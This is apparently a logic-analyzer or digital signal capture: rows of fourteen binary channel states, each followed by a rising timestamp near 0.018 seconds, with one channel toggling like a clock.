0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.7941396e-02 0,0,0,1,1,1,0,0,0,0,0,0,0,0,1.7941400e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7941404e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7941420e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7941444e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.7941448e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.7941468e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.7941492e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.7941516e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.7941540e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.7941568e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.7941592e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.7941620e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.7941644e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.7941668e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.7941692e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.7941744e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.7941768e-02 0,0,0,1,1,1,0,0,0,0,0,0,0,0,1.7941772e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7941776e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7941796e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7941820e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7941844e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7941868e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7941892e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7941916e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7941940e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7941968e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7941996e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7942020e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7942044e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7942068e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7942092e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7942116e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7942144e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7942168e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.7942172e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.7942220e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.7942244e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7942252e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7942268e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7942292e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7942316e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7942340e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7942368e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7942392e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7942420e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7942444e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7942468e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7942492e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7942516e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7942540e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7942568e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7942592e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7942620e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7942644e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7942668e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7942692e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7942744e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7942768e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.7942772e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.7942820e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.7942844e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7942852e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7942868e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7942892e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7942916e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7942940e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7942968e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7942992e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7943020e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7943044e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7943068e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7943092e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7943116e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7943140e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7943168e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7943192e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7943220e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7943244e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7943268e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7943292e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7943316e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7943340e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7943368e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7943392e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7943420e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7943444e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7943468e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7943492e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7943516e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7943540e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7943568e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7943592e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7943620e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7943644e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7943668e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7943692e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7943716e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7943740e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7943768e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7943792e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7943820e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7943844e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7943868e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7943892e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7943916e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7943940e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7943968e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7943992e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7944020e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7944044e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7944068e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7944092e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7944116e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7944140e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7944168e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7944192e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7944220e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7944244e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7944268e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7944292e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7944316e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7944340e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7944368e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7944392e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7944420e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7944444e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7944468e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7944492e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7944516e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7944540e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7944568e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7944596e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7944620e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7944644e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7944668e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7944692e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7944716e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7944740e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7944768e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7944792e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7944820e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7944844e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7944868e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7944892e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7944916e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7944940e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7944968e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7944992e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7945020e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7945044e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7945068e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7945092e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7945116e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7945140e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7945168e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7945192e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7945220e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7945244e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7945268e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7945292e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7945316e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7945340e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7945368e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7945392e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7945420e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7945444e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7945468e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7945492e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7945516e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7945540e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7945568e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7945592e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7945620e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7945644e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7945668e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7945692e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7945716e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7945740e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7945768e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7945792e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7945820e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7945844e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7945868e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7945892e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7945916e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7945940e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7945968e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7945992e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7946020e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7946044e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7946068e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7946092e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7946116e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7946140e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7946168e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7946192e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7946220e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7946244e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7946268e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7946292e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7946316e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7946340e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7946368e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7946392e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7946420e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7946444e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7946468e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7946492e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7946516e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7946540e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.8071396e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.8071632e-02 1,0,0,1,1,0,0,0,0,0,0,1,0,1,1.8071660e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.8071688e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,1.8071988e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.8072020e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,1.8072044e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.8072068e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,1.8072092e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.8072116e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,1.8072144e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.8072168e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,1.8072196e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.8072220e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,1.8072244e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.8072268e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8072292e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8072316e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8072344e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8072368e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8072396e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8072420e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8072444e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8072468e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8072492e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8072516e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8072544e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8072568e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8072596e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8072620e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8072644e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8072668e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8072692e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8072716e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8072744e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8072768e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8072796e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8072820e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8072844e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8072868e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8072892e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8072916e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8072944e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8072968e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8072996e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8073020e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8073044e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8073068e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8073092e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8073116e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8073144e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8073168e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8073196e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8073220e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8073244e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8073268e-02 1,0,0,1,1,0,0,0,0,1,0,0,0,0,1.8073272e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.8073276e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,1.8073316e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.8073344e-02 1,0,0,1,1,1,0,0,0,0,0,0,0,0,1.8073348e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8073352e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8073368e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8073396e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8073420e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8073444e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8073468e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8073492e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8073516e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8073540e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8073564e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8073588e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8073644e-02 1,0,0,1,1,0,0,0,0,1,0,0,0,0,1.8073668e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.8073672e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,1.8073692e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.8073716e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8073724e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8073740e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8073764e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8073788e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8073816e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8073840e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8073868e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8073892e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8073916e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8073940e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8073964e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8073988e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8074016e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8074040e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8074068e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8074092e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8074116e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.8074120e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,1.8074164e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.8074192e-02 1,0,0,1,1,1,0,0,0,0,0,0,0,0,1.8074196e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8074200e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8074216e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8074240e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8074268e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8074292e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8074320e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8074348e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8074372e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8074396e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8074424e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8074448e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8074476e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8074500e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8074524e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8074548e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8074572e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8074596e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8074652e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.8074676e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,1.8074700e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.8074724e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,1.8074772e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,1.8074796e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8074804e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8074824e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8074848e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8074876e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8074900e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8074924e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8074948e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8074972e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8074996e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8075024e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8075048e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8075068e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8075100e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8075124e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8075148e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8075172e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8075196e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8075224e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8075248e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8075276e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8075300e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8075324e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8075348e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8075372e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8075396e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8075424e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8075448e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8075476e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8075500e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8075524e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8075548e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8075572e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8075596e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8075624e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8075648e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8075676e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8075700e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8075724e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8075748e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8075772e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8075796e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8075824e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8075848e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8075876e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8075900e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8075924e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8075948e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8075972e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8075996e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8076024e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8076048e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8076076e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8076100e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8076124e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8076148e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8076172e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8076196e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8076224e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8076248e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8076276e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8076300e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8076324e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8076348e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8076372e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8076396e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8076424e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8076448e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8076476e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8076500e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8076524e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.8076548e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.8076572e-02 